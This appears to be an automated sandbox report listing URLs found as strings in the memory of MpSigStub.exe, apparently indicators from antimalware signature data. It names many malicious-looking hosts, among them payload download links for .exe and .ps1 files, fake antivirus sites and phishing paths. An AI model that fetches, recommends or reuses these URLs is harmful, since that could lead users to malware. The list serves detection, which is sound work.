Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://mfeed.if.ua/sl/get.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://service.softpost.com
Source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp String found in binary or memory: http://service.srvmd6.com/Mac/getInstallerSettings/?version=
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://serving.myshopcouponmac.com
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://setup-mediaplayer.info/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://setup.theoreon.com
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup1.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup2.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup3.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://setup4.tqzn.com/barbindsoft/barsetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://seuufhehfueughek.ws/
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://sf-addon.com/helper/setup/SaveFromNetHelper-Setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shieldapps.com/eula/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net//install/uplist2.php?pid=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://shop.doublepoint.net/install/p_boot.php
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://sighttp.qq.com
Source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp String found in binary or memory: http://simple%-files.com
Source: MpSigStub.exe, 0000000B.00000003.18296740257.0000021B5DF46000.00000004.00000001.sdmp String found in binary or memory: http://sindarspen.org.br/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://skorohod.city/invoice-corrections-for-
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://skyfalss.ir/hacnhhy/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://skype.tom.com/download/install/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://smart-antivirus-2009buy.com
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://smart.linkprice.com/sem/overture_sponsor_search.php?maxcnt=&js=2&type=x
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://smg-blackhat.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://so.163.com/search.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://softlog.twoshadow.cn/api/data/sync
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://sonyxweb.ru
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://soriya.kr
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://sp.whitetruem.com/g.php?d=
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://sploogetube.mobi/x.ps1
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sponsor01.info/08
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spotauditor.nsauditor.com
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://spotdewasa.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://spotvideoporno.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://spr-updates.ddns.net/spr_updates.php-o
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sputnikmailru.cdnmail.ru/mailruhomesearch.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=GKL&key=%s&v=%s&email=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spyarsenal.com/cgi-bin/reg.pl?p=fkl&key=%s&v=%s
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/download/141/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/load.php?adv=141
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://spywaresoftstop.com/wfdfdghfdghj.htm
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://spywprotect.com/purchase
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://stankomeland.duckdns.org/js//share.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://stasmaster.hut2.ru/rcv.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://stat.errclean
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://stat.wamme.cn/C8C/gl/cnzz60.html
Source: MpSigStub.exe, 0000000B.00000003.18301444780.0000021B5E291000.00000004.00000001.sdmp String found in binary or memory: http://statapi.aldtop.com
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://static.hostsecureplugin.com/sdb/fd/host-secure-updater.xml
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://staticrr.mixvideoplayer.com/sdb/e0/WebBrowser.xml
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://statisonline.casa/register.jpg
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://statistics.tom.com/scripts/Skype/sobar.exehttp://61.135.159.183/installer/sobar.exehttp://sky
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://stats.hosting24.com/count.php
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://status.clrsch.com/loader/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://status.qckads.com/
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://stiags.com.mx/zjeixcphncer/nbsa_
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://stive.hopto.org/pak.dot
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp String found in binary or memory: http://stroylux.ro/ds/1.gif
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://stroyprivoz.ru/dokumente-vom-notar/
Source: MpSigStub.exe, 0000000B.00000003.18305712611.0000021B5FAAF000.00000004.00000001.sdmp String found in binary or memory: http://student5.lab.classroom.kingdomit.org/wp-content/rechnungs-detail
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sturfajtn.com
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://stwinwebservices.examsoft.com/
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.crl.certum.pl/ctnca.crl0k
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://subca.ocsp-certum.com01
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://sun346.neta
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://supportwebcenter.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://svc-stats.linkury.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://switercom.ru/ds/26.gif
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://sxload.com
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://sys-doctor.com
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://t.amynx.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?dde
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://t.awcna.com/mail.jsp?js
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://t.cn/
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://t.go4321.com
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://t.jdjdcjq.top/
Source: MpSigStub.exe, 0000000B.00000003.18280918595.0000021B5F1EB000.00000004.00000001.sdmp String found in binary or memory: http://t.me/decovid19bot
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zer9g.com/
Source: MpSigStub.exe, 0000000B.00000003.18321595376.0000021B5F0A0000.00000004.00000001.sdmp String found in binary or memory: http://t.zz3r0.com/
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://tablet.doyo.cn/pop_window/pw_318_215
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zip
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://talele.50megs.com/Installer/safe.zipx
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.ha
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp String found in binary or memory: http://taobao.haodizhi.ccx
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://tbapi.search.ask.comxb
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://te.clickpotato.tv/pte.aspx
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp String found in binary or memory: http://te.platrium.com/pte.aspx
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://team.afcorp.afg/chr/crt-ho_30/newjflibrary
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://tecmon.hr/
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://teladea.blogspot.com
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponse
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponseaX
Source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersResponsex:
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/IUserService/GetUsersT
Source: MpSigStub.exe, 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/OSoft.Services.Webservice.SystemConfigService/SystemConfigServicexk
Source: MpSigStub.exe, 0000000B.00000003.18283976563.0000021B5F1A8000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/T
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/db_restorentDataSet.xsd
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/payrollDataSet1.xsd
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://tempuri.org/x
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://test.1g.io:3000
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://theenterpriseholdings.com/
Source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp String found in binary or memory: http://theonlybookmark.com/in.cgi?11&group=adv001URLGeneral1http://google.com/install.php?time=%dTim
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://thescanwinantivirxp.com/index.php?
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/3415201.pnga
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://thomastongrealestate.com/skywkc/dd(oaoabp%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tibia.pl/earth.php?x=
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://tikotin.com
Source: MpSigStub.exe, 0000000B.00000003.18321273368.0000021B5F0E3000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/allinone-downloader
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://tinyurl.com/jnvyzcl
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://tj.kpzip.com
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://tkcode.xyzx
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://toliku.com/qmzo.exe
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://tongji.bianya.cc/popup.ashx?type=0xM
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://tool.world2.cn/toolbar/
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://toolbar.deepdo.com/download/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://toolbarpartner.com
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://topguide.co.kr/update/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tpbtrack.info/index.php
Source: MpSigStub.exe, 0000000B.00000003.18306333757.0000021B5E65A000.00000004.00000001.sdmp String found in binary or memory: http://tracker.civas.co/UserTracker_deploy/requesthandler.aspx
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trackhits.cc/cnt
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trail.filespm.com/dealdo/install-report
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://transfer.sh/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://traveling-blog2017.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18265560901.0000021B5F5C8000.00000004.00000001.sdmp String found in binary or memory: http://trex-miner.com
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://trialservice.genesystuna.com/io/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://trusted-player.info/
Source: MpSigStub.exe, 0000000B.00000003.18317103836.0000021B5FD58000.00000004.00000001.sdmp String found in binary or memory: http://tsrv4.ws/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://tu5amrmm.systotal.com/vnmsq40nj1q7a.php?30/receivetimeout30/connecttimeout/silent
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://tube77.us.to/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://tumicy.com/plqijcndwoisdhsaow/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://turbogalaxy.org/ru/?q
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://u.to/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://u.to/ardgdq)
Source: MpSigStub.exe, 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp String found in binary or memory: http://uidacrtsppxece.com/ioir.png
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://uiltime.info/?c=v3
Source: MpSigStub.exe, 0000000B.00000003.18312668027.0000021B5E551000.00000004.00000001.sdmp String found in binary or memory: http://ulink7.dudu.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://ulog.cleaner2009pro.com/?action=
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download3.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp String found in binary or memory: http://uncpbisdegree.com/download4.php?q=
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://uniblue.com
Source: MpSigStub.exe, 0000000B.00000003.18263944103.0000021B5EC81000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it//?ext=824&pid=946
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.justplug.it/?pid=21&ext=bcool
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://uninstall.mysafesavings.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://union.hao3603.com/api/down
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://unstat.baidu.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://unstiff.pw
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://up.dev-point.com/uploads/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upd.lop.com/upd/check
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upd.zone-media.com/upd/check
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://update.cnnewmusic.com/get_gif.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://update.qyule.com/setup.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://update.shop-guide.co.kr/update/
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://update.sykehuspartner.no/splunk/
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp String found in binary or memory: http://update.utorrent.com/uninstall?type=%s-%U&h=%s&v=%d
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://update.windowssettings.org/patchwmp/__asf_script_command_ends_here__
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://update.xiaoshoupeixun.com/tsbho.ini
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://updates-spreadwork.pw
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://updates.winsoftware.com/
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://upgrade.onestepsearch.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://upload.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://uprevoy.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://uprotect.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://urels.ml/sokha2.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://www.direct-ip.com/
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://www.distance24.org/route.json?stops=
